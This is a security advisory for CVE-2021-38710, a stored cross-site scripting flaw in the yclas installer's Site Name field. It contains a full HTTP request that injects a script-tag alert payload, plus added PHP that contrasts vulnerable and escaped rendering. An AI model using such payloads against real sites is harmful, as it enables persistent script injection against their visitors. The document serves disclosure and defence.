security-n/CVE-2021-38710
yclas-xss1

STORED XSS (PERSISTENT XSS)

https://github.com/yclas/yclas

Install/View/Form.php accepts JavaScript in the "Site Name" field of the installer form and does not sanitize the input before saving it to the database, so the payload is stored and rendered wherever the site name is displayed.

```http
POST / HTTP/1.1
Host: 0.0.0.0:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 338
Origin: http://0.0.0.0:8081
Connection: close
Referer: http://0.0.0.0:8081/
Cookie: PHPSESSID=; theme=87a24f00f25f75f91eeacce8f9f24ae285233db5~atlantic-lite; session=

LANGUAGE=en_US&DB_HOST=localhost&DB_NAME=openclassifieds1&DB_USER=root&DB_PASS=kali&SAMPLE_DB=on&DB_CHARSET=utf8mb4&TABLE_PREFIX=yc4_&SITE_URL=http%3A%2F%2F0.0.0.0%3A8081%2F&SITE_FOLDER=%2F&SITE_NAME=<script>alert(1)</script>&TIMEZONE=America%2FLos_Angeles&ADMIN_EMAIL=testemail@test.com&ADMIN_PWD=test1234&HASH_KEY=
```
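As an added illustration, not code from the yclas project or from the advisory author, the PHP below shows why a raw stored site name is dangerous and the standard defence: HTML-entity encode the value at every output point, and optionally reject markup at input since a site name never needs tags. The function names are hypothetical and the stored sample value is constructed from the SITE_NAME field in the request above.

```php
<?php
// Added example (not yclas code). Simulates the "Site Name" setting after the
// installer has saved it unsanitized; sample value constructed from the
// request body on this page.
$storedSiteName = '<script>alert(1)</script>';

// Vulnerable rendering (hypothetical helper): the raw stored value is
// interpolated into HTML, so the browser executes it on every page that
// prints the site name, for every visitor.
function renderTitleVulnerable(string $siteName): string
{
    return "<title>$siteName</title>";
}

// Hardened rendering: encode at output with ENT_QUOTES so the value is safe in
// element content and in attribute values; UTF-8 matches DB_CHARSET=utf8mb4
// from the request. ENT_SUBSTITUTE avoids returning an empty string on
// malformed byte sequences, which would otherwise silently blank the title.
function renderTitleSafe(string $siteName): string
{
    $escaped = htmlspecialchars(
        $siteName,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return "<title>$escaped</title>";
}

// Input-side check for the installer (defence in depth, not a replacement
// for output encoding): a site name containing any markup is rejected.
function isAcceptableSiteName(string $siteName): bool
{
    return $siteName !== '' && $siteName === strip_tags($siteName);
}

echo renderTitleVulnerable($storedSiteName), PHP_EOL;
echo renderTitleSafe($storedSiteName), PHP_EOL;
var_dump(isAcceptableSiteName($storedSiteName));
var_dump(isAcceptableSiteName('My Classifieds'));
```

Output encoding is the control that closes the issue; the input check only narrows what reaches the database.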

SCREENSHOTS AVAILABLE IN THE REPO FILES

DISCOVERED BY NATHAN JOHNSON ON 8/15/2021
